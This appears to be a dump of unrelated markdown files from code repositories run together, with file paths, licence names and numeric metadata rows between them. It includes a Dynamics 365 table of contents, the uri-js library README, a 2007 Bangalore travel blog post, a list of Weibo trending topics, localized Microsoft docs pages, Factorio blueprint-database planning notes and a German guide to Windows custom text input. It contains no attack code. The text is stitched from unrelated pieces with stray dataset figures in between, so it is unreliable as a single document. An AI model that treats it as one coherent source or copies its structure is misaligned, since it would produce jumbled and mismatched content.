## [Drill down in a chart](../basics/drill-down-chart.md)
# [Reports](../basics/run-report.md)
## [Share a report](../basics/share-report-users-teams.md)
## [Who can use a report?](../basics/determine-who-can-use-report.md)
## [Download a report](../basics/download-report.md)
## [Create, edit, or copy a report with the Report Wizard](create-edit-copy-report-wizard.md)
## [Organize and lay out your report data](organize-lay-out-your-report-data.md)
## [Edit the default filter of a report](edit-default-filter-report.md)
## [Add an existing report](../basics/add-existing-report.md)
## [Troubleshoot reports](../basics/troubleshoot-reports.md)
### [Account insights](../basics/account-insights-reports.md)
### [Marketing insights](../basics/marketing-insights-reports.md)
### [Sales insights](../basics/sales-insights-reports.md)
### [Product insights](../basics/product-insights-reports.md)
### [Invoice, quotes and orders](../basics/invoice-quote-order-reports.md)
### [Service insights](../basics/service-insights-reports.md)
### [Admin reports](../basics/user-summary-report.md)
# [Activities and the activities feed](../basics/work-with-activities.md)
## [Add an activity to a record](../basics/add-phone-call-task-email-appointment-activity-case-record.md)
## [Activities feed](../basics/stay-up-date-with-customer-news-with-activity-feed.md)
## [Appointments](../basics/create-edit-appointment.md)
## [Call using Skype](../basics/place-calls-with-skype-skype-business.md)
## [Workplace calendar](../basics/workplace-calendar.md)
## [Add a signature for an email or queue](create-signature-dynamics-365-email-queue.md)
## [Send bulk email](../basics/send-bulk-email-customers.md)
# [Collaboration](../basics/collaborate-with-team.md)
## [Microsoft 365 Groups](../basics/collaborate-with-colleagues-using-office-365-groups.md)
## [Microsoft 365 Groups FAQ](../basics/office-365-groups-dynamics-365-faqs.md)
## [OneDrive for Business](../basics/use-onedrive-business-manage-private-documents.md)
<!-- OneNote isn't supported with on-premises ## [OneNote](../basics/use-onenote.md)
## [OneNote FAQs](../basics/onenote-dynamics-365-faqs.md)-->
## [SharePoint documents](manage-sharepoint-documents-document-locations-in-Dynamics-365-apps.md)
# [Import and export data](../basics/import-export-data.md)
## [Import contacts](../basics/import-contacts.md)
## [Import accounts, leads and more](../basics/import-accounts-leads-other-data.md)
## [Merge duplicate records for accounts, contacts, or leads](merge-duplicate-records-accounts-contacts-leads.md)
## [Export to Excel](../basics/export-data-excel.md)
## [Export to Excel dynamic worksheet](../basics/export-excel-dynamic-worksheet.md)
## [Export to Excel static worksheet](../basics/export-excel-static-worksheet.md)
## [Export to Excel PivotTable](../basics/export-excel-pivottable.md)
# [Use Dynamics 365 mobile app](dynamics-365-phones-tablets-users-guide-onprem.md)
node_modules/sails/node_modules/anchor/node_modules/gjtk/node_modules/uri-js/README.md | troverman/sails-chat-websockets | MIT
# URI.js
URI.js is an [RFC 3986](http://www.ietf.org/rfc/rfc3986.txt) compliant, scheme extendable URI parsing/validating/resolving library for all JavaScript environments (browsers, Node.js, etc).
## Loading
To load in a browser, use the following tag:
<script type="text/javascript" src="uri-js/dist/uri.min.js"></script>
To load in a CommonJS (Node.js) environment, simply use:
var URI = require("./uri-js");
## API
### Parsing & Validating
var components = URI.parse("uri://user:[email protected]:123/one/two.three?q1=a1&q2=a2#body");
//returns:
//{
// errors : [],
// scheme : "uri",
// userinfo : "user:pass",
// host : "example.com",
// port : 123,
// path : "/one/two.three",
// query : "q1=a1&q2=a2",
// fragment : "body"
//}
### Serializing
URI.serialize({scheme : "http", host : "example.com", fragment : "footer"}) === "http://example.com/#footer"
### Resolving
URI.resolve("uri://a/b/c/d?q", "../../g") === "uri://a/g"
### Normalizing
URI.normalize("HTTP://ABC.com/%7Esmith/home.html") === "http://abc.com/~smith/home.html"
### Comparison
URI.equal("example://a/b/c/%7Bfoo%7D", "eXAMPLE://a/./b/../b/%63/%7bfoo%7d") === true
### Options
All of the above functions can accept an additional options argument that is an object that can contain one or more of the following properties:
* `scheme`
Indicates the scheme that the URI should be treated as, overriding the URI's normal scheme parsing behavior.
* `reference`
If set to `"suffix"`, it indicates that the URI is in the suffix format, and the validator will use the option's `scheme` property to determine the URI's scheme.
* `tolerant`
If set to `true`, the parser will not report invalid URIs. It will also relax URI resolving rules.
## Scheme Extendable
URI.js supports inserting custom [scheme](http://en.wikipedia.org/wiki/URI_scheme)-dependent processing rules. For example, here is the code for HTTP scheme normalization:
URI.SCHEMES["http"] = {
serialize : function (components, options) {
//normalize the default port
if (components.port === 80) {
components.port = undefined;
}
//normalize the empty path
if (!components.path) {
components.path = "/";
}
return components;
}
};
Currently, URI.js has built in support for the following schemes:
* http \[[RFC 2616](http://www.ietf.org/rfc/rfc2616.txt)\]
* urn \[[RFC 2141](http://www.ietf.org/rfc/rfc2141.txt)\]
* urn:uuid \[[RFC 4122](http://www.ietf.org/rfc/rfc4122.txt)\]
## License
Copyright 2011 Gary Court. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY GARY COURT "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL GARY COURT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of Gary Court.
_posts/wordpress/2007-09-08-being-phileas-fogg-day-2.md | olympum/olympum.github.io | Apache-2.0
---
layout: post
title: Being Phileas Fogg, Day 2
date: 2007-09-08 19:36:43.000000000 +01:00
categories:
- Personal
tags: []
status: publish
type: post
published: true
meta:
tmac_last_id: '531409225583312896'
author:
login: admin
email: [email protected]
display_name: Bruno Fernandez-Ruiz
first_name: Bruno
last_name: Fernandez-Ruiz
---
After a peaceful flight, and a short sleep, we landed at 4.30AM in
Bangalore. Getting through immigration in Indian airports is always a
unique experience, but this time I really flew through passport
control and customs, especially since I only had carry on luggage.
Note to self: never check-in luggage.
<p>The problem was outside. My driver from Le Méridien was not there. There was another driver from the hotel waiting, but for another guest. I had to wait. And after more than 10 hours on a plane, with little sleep, I was wondering why I had to wait for my driver. Anyway, after a few calls, he did finally show up, claiming he had had trouble parking. I mean, how difficult is it to park at 4.30AM in an almost empty car park? No tip.</p>
<p>On the way to the hotel I noticed how different Bangalore is from New Delhi. Whereas New Delhi is all upside down, full of works, cows, and messy as hell, Bangalore is relatively tidy and developed. Even the thousands of trucks cruising during the night in New Delhi, since they are limited during the day, were not present in Bangalore.</p>
<p>I managed to catch an hour of sleep before going into the office. The hotel is alright, but I would not recommend it. You really don't get much for your money, and there are better options in Bangalore, which actually happen to be closer to both Yahoo! offices in MGR and EGL. As much as I normally like both Le Méridien and Sheratons, this one simply does not cut it. The rooms were not very clean, some light bulbs were blown out, and you can smell the kitchen from the rooms. Also the shower-in-bath does not cut it, with barely any pressure and water getting all over the place.</p>
<p>The day at the EGL office was really good and productive. It's always inspiring to meet the teams, and this time was no different. The facilities are also really good. It feels like being back in Sunnyvale.</p>
<p>On the way back I stopped by the State Cottage Emporium in MG Road, an (allegedly) safe place to shop for foreigners, with marked prices. Well, after bargaining a 25% discount on a traditional necklace, and walking out proudly, I felt strange about such a discount, and I am not sure whether I was an artist of negotiation, or really, really, stupid.</p>
2020/10/27/2020-10-27 18:45.md | zhzhzhy/WeiBoHot_history | MIT
Status: 200
1.应采儿二胎剖腹产过程
微博热度:2892562
2.火神山雷神山医院今昔航拍对比
微博热度:2550579
3.白敬亭挺你到底
微博热度:2455373
4.欢乐颂将拍三四五季
微博热度:2262073
5.蔡徐坤张钧甯8年后同框
微博热度:1606204
6.邓超创造营2021发起人
微博热度:1319231
7.赵睿被驱逐
微博热度:1080449
8.女孩穿露背装在有轨电车拍照遭斥责
微博热度:905230
9.蓬佩奥因涉嫌违反联邦法律被调查
微博热度:880364
10.刘鑫
微博热度:874677
11.斛珠夫人预告片质感
微博热度:868268
12.高丰文去世
微博热度:772381
13.王牌对王牌新成员
微博热度:710923
14.外交部回应美再批对台24亿美元军售
微博热度:700158
15.被同伴推下水女子女儿再发声
微博热度:690916
16.PUBG
微博热度:670783
17.公交车上拍写真有错吗
微博热度:660475
18.小学生上丰收课挖红薯500斤
微博热度:636230
19.东部战区特种兵水下射击画面
微博热度:620124
20.董子健刘昊然王俊凯 长大成人
微博热度:607769
21.林彦俊新歌被指抄袭
微博热度:593042
22.陶虹穿着礼服打麻将
微博热度:568669
23.糖葫芦小贩用唾液沾芝麻被拍下
微博热度:561479
24.曾患新冠的黑脸医生易凡白回来了
微博热度:522077
25.鞠婧祎工作室声明
微博热度:515452
26.男子酒后杀害两岁幼童被判死刑
微博热度:503989
27.大海可以有多恐怖
微博热度:464934
28.全聚德三个季度亏掉三年利润
微博热度:463138
29.聋哑外卖小哥被骗民警怒斥骗子
微博热度:463053
30.很注意细节的邻居
微博热度:463044
31.明星细节见人品的动作
微博热度:463043
32.杰尼斯已经不给我批假了
微博热度:418780
33.青簪行对称海报
微博热度:415307
34.新加坡暂停使用两款流感疫苗
微博热度:404438
35.唐嫣皇后造型
微博热度:397915
36.新生日记
微博热度:364292
37.世界恋爱日
微博热度:322824
38.李易峰古装白发造型
微博热度:281948
39.毛晓彤在逃红皇后vlog
微博热度:279468
40.CBA
微博热度:264858
41.乔欣吻戏后给胡一天擦嘴
微博热度:241382
42.梅婷谈高龄妈妈的压力
微博热度:240576
43.腾讯视频2021大剧片单
微博热度:226544
44.喀什完成全员核酸检测
微博热度:210303
45.故宫银杏绝美秋景
微博热度:207767
46.喀什新增5例确诊病例
微博热度:204859
47.螺蛳粉闻臭师日闻300吨酸笋
微博热度:202861
48.江歌母亲诉谭斌侮辱诽谤案二审宣判
微博热度:162544
49.考试时停电高三生开台灯淡定答题
微博热度:148088
50.原来是晶哥
微博热度:147530
| 7.053922 | 20 | 0.787352 | yue_Hant | 0.377213 |
97970e9b4da908fe734bd3490f5b09cc19da1c9a | 1,159 | md | Markdown | aspnetcore/client-side/spa/react-with-redux.md | 764297968/Docs.zh-cn | 419059912de53165d8897c710cf5307a07c03ed1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | aspnetcore/client-side/spa/react-with-redux.md | 764297968/Docs.zh-cn | 419059912de53165d8897c710cf5307a07c03ed1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | aspnetcore/client-side/spa/react-with-redux.md | 764297968/Docs.zh-cn | 419059912de53165d8897c710cf5307a07c03ed1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Use the React-with-Redux project template with ASP.NET Core
author: SteveSandersonMS
description: Learn how to get started with the ASP.NET Core single-page application (SPA) project template for React with Redux and create-react-app.
monikerRange: '>= aspnetcore-2.0'
ms.author: scaddie
ms.custom: mvc
ms.date: 02/21/2018
uid: spa/react-with-redux
ms.openlocfilehash: dab3d20865250aae548bff4614e631dd7c73b46f
ms.sourcegitcommit: a1afd04758e663d7062a5bfa8a0d4dca38f42afc
ms.translationtype: MT
ms.contentlocale: zh-CN
ms.lasthandoff: 06/20/2018
ms.locfileid: "36291480"
---
# <a name="use-the-react-with-redux-project-template-with-aspnet-core"></a>通过 ASP.NET Core 使用带 Redux 的 React 项目模板
::: moniker range="= aspnetcore-2.0"
> [!NOTE]
> 本文档不涉及 ASP.NET Core 2.0 中包含的带 Redux 的 React项目模板。 本文介绍你可以手动更新的新版带 Redux 的 React 模板。 该模板默认包含在 ASP.NET Core 2.1 中。
::: moniker-end
更新的带 Redux 的 React 项目模板为使用 React、Redux 和 [create-react-app](https://github.com/facebookincubator/create-react-app) (CRA) 约定实现丰富的客户端用户界面 (UI) 的 ASP.NET Core 应用程序提供了便捷起点。
除了项目创建命令外,关于带 Redux 的 React 模板的所有信息都与 React 模板相同。 要创建此项目类型,请运行 `dotnet new reactredux` 而不是 `dotnet new react`。 有关这两个基于 React 的模板的通用功能的详细信息,请参阅 [React 模板文档](xref:spa/react)。
docs/2014/integration-services/access-to-the-integration-services-service.md | baleng/sql-docs.it-it | CC-BY-4.0, MIT
---
title: Access to the Integration Services Service | Microsoft Docs
ms.custom: ''
ms.date: 03/06/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology:
- integration-services
ms.topic: conceptual
helpviewer_keywords:
- SSIS packages, security
- viewing packages while running
- displaying packacges while running
- security [Integration Services], running packages
- packages [Integration Services], security
- current packages running
- Integration Services packages, security
- SQL Server Integration Services packages, security
ms.assetid: 1088aafc-14c5-4e7d-9930-606a24c3049b
author: douglaslms
ms.author: douglasl
manager: craigg
ms.openlocfilehash: 7e9baff13c2bc368557a49b4509c6e48a444d583
ms.sourcegitcommit: 3da2edf82763852cff6772a1a282ace3034b4936
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 10/02/2018
ms.locfileid: "48132121"
---
# <a name="access-to-the-integration-services-service"></a>Accesso al servizio Integration Services
Tramite i livelli di protezione dei pacchetti è possibile limitare gli utenti a cui è consentito modificare ed eseguire un pacchetto. Per limitare gli utenti a cui è consentito visualizzare l'elenco di pacchetti attualmente in esecuzione in un server e arrestare i pacchetti attualmente in esecuzione in [!INCLUDE[ssManStudioFull](../includes/ssmanstudiofull-md.md)]è necessaria una protezione aggiuntiva.
In [!INCLUDE[ssManStudioFull](../includes/ssmanstudiofull-md.md)] l'elenco dei pacchetti in esecuzione viene visualizzato tramite il servizio [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)]. I membri del gruppo Administrators di Windows possono visualizzare e arrestare tutti i pacchetti in esecuzione. Gli utenti che non appartengono a questo gruppo possono visualizzare e arrestare solo i pacchetti che hanno avviato personalmente.
È importante limitare l'accesso ai computer che eseguono un servizio [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)] , soprattutto se si tratta di un servizio [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)] che consente l'enumerazione di cartelle remote. Gli utenti autenticati possono richiedere l'enumerazione di pacchetti. Anche se il servizio non viene individuato, le cartelle vengono comunque enumerate dal servizio. Questi nomi di cartella potrebbero essere sfruttati da un utente malintenzionato. Se un amministratore ha configurato il servizio in modo da consentire l'enumerazione di cartelle in un computer remoto, agli utenti potrebbero essere visualizzati anche i nomi di cartella in genere non visibili.
docs/csharp/language-reference/index.md | cihanyakar/docs.tr-tr | CC-BY-4.0, MIT
---
title: C# Reference
ms.date: 02/14/2017
helpviewer_keywords:
- Visual C#, language reference
- language reference [C#]
- Programmer's Reference for C#
- C# language, reference
- reference, C# language
ms.assetid: 06de3167-c16c-4e1a-b3c5-c27841d4569a
ms.openlocfilehash: c9400c2836d923fe92ed88ec947a1953800bc47d
ms.sourcegitcommit: 77d9a94dac4c05827ed0663d95e0f9ad35d6682e
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 05/24/2018
ms.locfileid: "34472509"
---
# <a name="c-reference"></a>C# Başvurusu
Bu bölümde, C# anahtar sözcükleri, işleçler, özel karakterler, önişlemci yönergeleri, derleyici seçenekleri ve derleyici hataları ve Uyarıları hakkında başvuru bilgileri sağlar.
## <a name="in-this-section"></a>Bu Bölümde
[C# Anahtar Sözcükleri](../../csharp/language-reference/keywords/index.md)
C# anahtar sözcükleri ve sözdizimi hakkında bilgilere bağlantılar sağlar.
[C# İşleçleri](../../csharp/language-reference/operators/index.md)
C# işleçleri ve sözdizimi hakkında bilgilere bağlantılar sağlar.
[C# Özel Karakterleri](../../csharp/language-reference/tokens/index.md)
C# ve bunların kullanım özel bağlamsal karakterler hakkında bilgilere bağlantılar sağlar.
[C# Ön İşlemci Yönergeleri](../../csharp/language-reference/preprocessor-directives/index.md)
C# kaynak kodu olarak katıştırma derleyici komutlar hakkında bilgilere bağlantılar sağlar.
[C# Derleyici Seçenekleri](../../csharp/language-reference/compiler-options/index.md)
Derleyici seçenekleri ve bunların nasıl kullanılacağını hakkında bilgiler içerir.
[C# Derleyici Hataları](../../csharp/language-reference/compiler-messages/index.md)
Neden ve C# derleyici hataları ve Uyarıları düzeltme gösteren kod parçacıkları içerir.
[C# dil belirtimi](../../csharp/language-reference/language-specification/index.md)
C# dil belirtimi en son sürümlerini bağlantılar sağlar.
## <a name="related-sections"></a>İlgili Bölümler
[C# Kılavuzu](../../csharp/index.md)
Visual C# belgeleri için bir portal sağlar.
[C# için Visual Studio Geliştirme Ortamını Kullanma](/visualstudio/csharp-ide/using-the-visual-studio-development-environment-for-csharp)
IDE ve düzenleyici açıklayan görev konuları ve kavramsal bağlantılar sağlar.
[C# Programlama Kılavuzu](../../csharp/programming-guide/index.md)
C# programlama dilini kullanma hakkında bilgi içerir.
| 45.698113 | 179 | 0.760941 | tur_Latn | 0.996116 |
97985448831087fe5716190f127fbcf14a989907 | 2,806 | md | Markdown | NOTES.md | factorio-tools/blueprints-db | 9eb1bec94ef25cb8842d885181410cd5ec1d9bb0 | [
"MIT"
] | 8 | 2019-05-29T23:29:26.000Z | 2020-08-28T14:32:31.000Z | NOTES.md | factorio-tools/blueprints-db | 9eb1bec94ef25cb8842d885181410cd5ec1d9bb0 | [
"MIT"
] | 29 | 2019-06-10T12:55:16.000Z | 2021-06-06T18:02:29.000Z | NOTES.md | factorio-tools/blueprints-database | 9eb1bec94ef25cb8842d885181410cd5ec1d9bb0 | [
"MIT"
] | null | null | null | # Factorio Blueprints Database
## Features
### Filtering
- mods
- game version
- game stage (early/mid/late-game) - maybe generated automatically based on a set of rules that would be provided for the user as well (for transparency reasons)
- beacons? - could be included as a late-game thing (same with modules?)
### Sorting
- page views
- downloads
- favorites
- popularity (taken into account would be page views, downloads and favorites)
- newly added
### Blueprint Page
- title
- headline
- description
- thumbnail (generated on the client via a popup modal using the viewer with some sort of square viewfinder to select the thumbnail) - maybe allow user uploads as well?
- blueprint statistics (can be extracted automatically from the blueprint string) - stuff like game version, mods used, blueprint name, blueprint icons, #of items used
- report button - site admins will see: the blueprint in question, nr of reports for it and a list of reasons from the users that have reported it
## Design
[InVision](https://projects.invisionapp.com/share/PWS7F35KNTZ#/screens?browse)
## Tech stack
- Svelte (with Sapper) - framework like react/vue but lighter and faster
- ArangoDB - database that has built in support for search and is multi model (documents, graph, KV)
- GraphQL - not sure yet
- DigitalOcean - for hosting
- Cloudflare - for DNS and caching
- Backblaze B2 - for static files like images
- Cloudflare and Backblaze B2 are part of the "Bandwidth Alliance", meaning you don't pay for the data transfer
## Cruddl Cheatsheet
[Reference](https://github.com/AEB-labs/cruddl/blob/master/docs/modelling.md)
### Object Types
@rootEntity
- main entity
@childEntity
- only used within a list type (ie items: [OrderItem])
@entityExtension
- object (ie paymentInfo: PaymentInfo)
- values can be omitted and they will not be overwritten
@valueObject
- like @entityExtension but atomic (omitted values will be set to null)
### Relations
@relation
@relation(inverseOf: "customer")
### References
@reference(keyField: "countryISOCode")
- cruddl 0.9 only
- will return the data in another @rootEntity using the key in the current @rootEntity
### Calculated fields
@traversal(path: "orders.items")
- follows a path and collects all objects on the way
@aggregation(path: "items.quantity", aggregator: SUM)
- same as @traversal but applies a fn to the collected objects
- aggregators:
- COUNT - supported on all kinds of types (object types and scalars)
- MIN, MAX - supported on Int, Float, DateTime, LocalDate and LocalTime
- AVERAGE, SUM - supported only on Int and Float
### Indices
@unique
@index
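To see how these directives fit together, here is a minimal sketch of a cruddl schema (type and field names are invented for illustration, and `@key` is assumed from the linked modelling reference):
```graphql
type Order @rootEntity {
  orderNumber: String @key
  items: [OrderItem]
  paymentInfo: PaymentInfo
  customer: Customer @relation
  totalQuantity: Int @aggregation(path: "items.quantity", aggregator: SUM)
}
type OrderItem @childEntity {
  itemNumber: String @index
  quantity: Int
}
type PaymentInfo @entityExtension {
  method: String
}
type Customer @rootEntity {
  name: String @unique
  orders: [Order] @relation(inverseOf: "customer")
}
```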
| 26.980769 | 168 | 0.751247 | eng_Latn | 0.985879 |
97993d6423bffe48664f10908bd4b917501683f7 | 48 | md | Markdown | README.md | Descalzo404/CS50-Problem-Sets | a05f39a33e4b5b478c2f2399d4fa4941aa133705 | [
"MIT"
] | null | null | null | README.md | Descalzo404/CS50-Problem-Sets | a05f39a33e4b5b478c2f2399d4fa4941aa133705 | [
"MIT"
] | null | null | null | README.md | Descalzo404/CS50-Problem-Sets | a05f39a33e4b5b478c2f2399d4fa4941aa133705 | [
"MIT"
] | null | null | null | # CS50
Problem sets from HarvardX course CS50.
| 16 | 40 | 0.770833 | eng_Latn | 0.939537 |
979956958ed04c5dc55f96cfe0f33484aee3190b | 1,191 | md | Markdown | README.md | jsdelivrbot/label-gun | 3eb6da1ab727aea31c6db7aa948e9f0b6c883273 | [
"ISC"
] | null | null | null | README.md | jsdelivrbot/label-gun | 3eb6da1ab727aea31c6db7aa948e9f0b6c883273 | [
"ISC"
] | 2 | 2017-10-26T09:48:01.000Z | 2018-02-25T15:19:08.000Z | README.md | retorquere/issue-bot | 4e0991eb651f2907612795770a4ccdc8bd825813 | [
"0BSD"
] | null | null | null | # issue-workflow
A GitHub App built with [probot](https://github.com/probot/probot) that automatically labels issues that require user feedback, on the assumption that if a repo contributor responds but does not close the issue, more user input is required. If a non-contributor responds, the label is removed.
You can steer this behavior by adding a YAML file at `.github/config.yml` in your repo that looks like
```
label-gun:
labels:
ignore:
- chatter
- wontfix
reopen:
      - "*"
feedback: awaiting-user-feedback
```
which means:
1. Don't label (or unlabel) issues that have one or more of the named labels
2. If a non-contributor comments on a closed issue that carries one of these labels, reopen the issue. This works on the assumption that if users are still commenting on the issue, there are remaining questions, and the issue isn't really dealt with fully. `*` means "any issue, labelled or not"
3. Use this label to mark issues that require user feedback (`awaiting-user-feedback` is the default, so if you omit `feedback`, issues will get this label).
## Setup
Install the GitHub App by visiting [this link](https://github.com/settings/apps/label-gun/installations)
| 44.111111 | 295 | 0.751469 | eng_Latn | 0.999136 |
9799d9ede5ec0f1cf2ada743907b17a4fe7dfd82 | 17,475 | md | Markdown | windows-apps-src/design/input/custom-text-input.md | Aaron-Junker/windows-uwp.de-de | 7171d224a4a27d04e54ab083568710e32235af3d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/design/input/custom-text-input.md | Aaron-Junker/windows-uwp.de-de | 7171d224a4a27d04e54ab083568710e32235af3d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/design/input/custom-text-input.md | Aaron-Junker/windows-uwp.de-de | 7171d224a4a27d04e54ab083568710e32235af3d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: The core text APIs in the Windows.UI.Text.Core namespace enable a Windows app to receive text input from any text service supported on Windows devices.
title: Custom text input overview
ms.assetid: 58F5F7AC-6A4B-45FC-8C2A-942730FD7B74
label: Custom text input
template: detail.hbs
keywords: keyboard, text, core text, custom text, Text Services Framework, input, user interactions
ms.date: 09/24/2020
ms.topic: article
ms.localizationpriority: medium
ms.openlocfilehash: 95dbd6de78cb6670ea7e904252bbc1f9f14edb77
ms.sourcegitcommit: 4f032d7bb11ea98783db937feed0fa2b6f9950ef
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 10/08/2020
ms.locfileid: "91829635"
---
# <a name="custom-text-input"></a>Benutzerdefinierte Texteingabe
Mit den Kerntext-APIs im [**Windows. UI. Text. Core**](/uwp/api/Windows.UI.Text.Core) -Namespace kann eine Windows-App Texteingaben von einem beliebigen Text Dienst empfangen, der auf Windows-Geräten unterstützt wird. Die APIs sind den [Textdienstframework](/windows/desktop/TSF/text-services-framework)-APIs dahingehend ähnlich, dass die App keine detaillierten Kenntnisse über die Textdienste benötigt. Auf diese Weise kann die App Text in einer beliebigen Sprache und von einem beliebigen Eingabegerät empfangen, wie Tastatur, Sprache oder Stift.
> **Wichtige APIs**: [**Windows. UI. Text. Core**](/uwp/api/Windows.UI.Text.Core), [**coretexteditcontext**](/uwp/api/Windows.UI.Text.Core.CoreTextEditContext)
## <a name="why-use-core-text-apis"></a>Gründe für die Verwendung von Core-Text-APIs
Für zahlreiche Apps sind die XAML- oder HTML-Textfeld-Steuerelemente für Texteingabe und Textbearbeitung ausreichend. Wenn Ihre App jedoch komplexe Textszenarien behandelt, beispielsweise eine Textverarbeitungs-App ist, benötigen Sie vielleicht die Flexibilität eines benutzerdefinierten Textbearbeitungssteuerelements. Sie könnten die [**CoreWindow**](/uwp/api/Windows.UI.Core.CoreWindow)-Tastatur APIs verwenden, um das Textbearbeitungssteuerelement zu erstellen. Diese ermöglichen jedoch keinen Empfang von kompositionsbasierten Texteingaben, die für die Unterstützung ostasiatischer Sprachen erforderlich sind.
Verwenden Sie stattdessen die [**Windows.UI.Text.Core**](/uwp/api/Windows.UI.Text.Core)-APIs, wenn Sie ein benutzerdefiniertes Textbearbeitungssteuerelement erstellen müssen. Diese APIs sind so konzipiert, dass sie Ihnen ein hohes Maß an Flexibilität bei der Verarbeitung von Texteingaben in allen Sprachen bieten. Sie können daher Textverarbeitung so gestalten, wie dies für Ihre App am besten ist. Texteingabe- und Textbearbeitungssteuerelemente, die mit den Core-Text-APIs erstellt wurde, können Texteingaben von allen vorhandenen Texteingabemethoden auf Windows-Geräten empfangen, von [Textdienstframework](/windows/desktop/TSF/text-services-framework)-basierten Eingabemethoden-Editoren (IMEs) und Handschrift auf PCs bis hin zu der WordFlow-Tastatur (die AutoKorrektur, Vorhersage und Diktat bereitstellt) auf mobilen Geräten.
## <a name="architecture"></a>Aufbau
Im Folgenden finden Sie eine einfache Darstellung des Texteingabesystems.
- "Application" stellt eine Windows-App dar, die ein benutzerdefiniertes Bearbeitungs Steuerelement mit den Kerntext-APIs erstellt.
- Die [**Windows.UI.Text.Core**](/uwp/api/Windows.UI.Text.Core)-APIs ermöglichen die Kommunikation mit Textdiensten über Windows. Die Kommunikation zwischen dem Textbearbeitungssteuerelement und den Textdiensten erfolgt in erster Linie über ein [**CoreTextEditContext**](/uwp/api/Windows.UI.Text.Core.CoreTextEditContext)-Objekt, das die Methoden und Ereignisse für die Kommunikation bereitstellt.

## <a name="text-ranges-and-selection"></a>Textbereiche und Auswahl
Bearbeitungssteuerelemente bieten Platz für die Eingabe von Text, und Benutzer erwarten, dass Text an einer beliebigen Stelle in diesem Bereich bearbeitet werden kann. Hier wird das von den Core-Text-APIs verwendete Textpositionierungssystem erläutert und wie Bereiche und Auswahlen in diesem System dargestellt werden.
### <a name="application-caret-position"></a>Textcursorposition der Anwendung
Textbereiche, die mit den Core-Text-APIs verwendet werden, werden mittels Textcursorpositionen ausgedrückt. Eine „Textcursorposition der Anwendung“ (Application Caret Position, ACP) ist eine nullbasierte Zahl, die die Anzahl der Zeichen vom Anfang des Textstreams bis unmittelbar vor dem Textcursor angibt, wie hier gezeigt.

### <a name="text-ranges-and-selection"></a>Textbereiche und Auswahl
Textbereiche und -auswahlen werden anhand der [**CoreTextRange**](/uwp/api/Windows.UI.Text.Core.CoreTextRange)-Struktur dargestellt, die zwei Felder enthält:
| Feld | Datentyp | Beschreibung |
|------------------------|---------------------------------------------------------------------------|----------------------------------------------------------------------------------|
| **StartCaretPosition** | **Zahl** \[ Ja\] | **System. Int32** \[ .net\] | **Int32** \[ C++\] | Die Startposition eines Bereichs ist die Textcursorposition der Anwendung unmittelbar vor dem ersten Zeichen. |
| **EndCaretPosition** | **Zahl** \[ Ja\] | **System. Int32** \[ .net\] | **Int32** \[ C++\] | Die Endposition eines Bereichs ist Textcursorposition der Anwendung unmittelbar nach dem letzten Zeichen. |
Im oben gezeigten Textbereich gibt der Bereich \[ 0, 5 z \] . b. das Wort "Hello" an. **StartCaretPosition** muss stets kleiner oder gleich der **EndCaretPosition** sein. Der Bereich \[ 5, 0 \] ist ungültig.
### <a name="insertion-point"></a>Einfügemarke
Die aktuelle Position der Einfügemarke, die häufig als Einfügemarke bezeichnet wird, wird dargestellt, indem die **startcaretposition** auf die **endcaretposition**festgelegt wird.
### <a name="noncontiguous-selection"></a>Nicht zusammenhängende Auswahl
Einige Bearbeitungssteuerelemente unterstützen nicht zusammenhängende Auswahlen. Microsoft Office-Apps unterstützen z. B. eine beliebige Mehrfachauswahl, und viele Quellcode-Editoren unterstützen die Spaltenauswahl. Die Kerntext-APIs unterstützen jedoch nicht zusammenhängende Auswahlmöglichkeiten. Bearbeitungssteuerelemente müssen nur eine einzige zusammenhängende Auswahl melden; meistens ist dies der aktive Unterbereich der nicht zusammenhängenden Auswahlen.
Die folgende Abbildung zeigt beispielsweise einen Textstream mit zwei nicht zusammenhängenden Auswahlen: \[ 0, 1 \] und \[ 6, 11 \] für die das Bearbeitungs Steuerelement nur eine Meldung (entweder \[ 0, 1 \] oder \[ 6, 11) melden muss \] .

## <a name="working-with-text"></a>Arbeiten mit Text
Die [**CoreTextEditContext**](/uwp/api/Windows.UI.Text.Core.CoreTextEditContext)-Klasse ermöglicht einen Textfluss zwischen Windows und Bearbeitungssteuerelementen über das [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignis, das [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis und die [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged)-Methode.
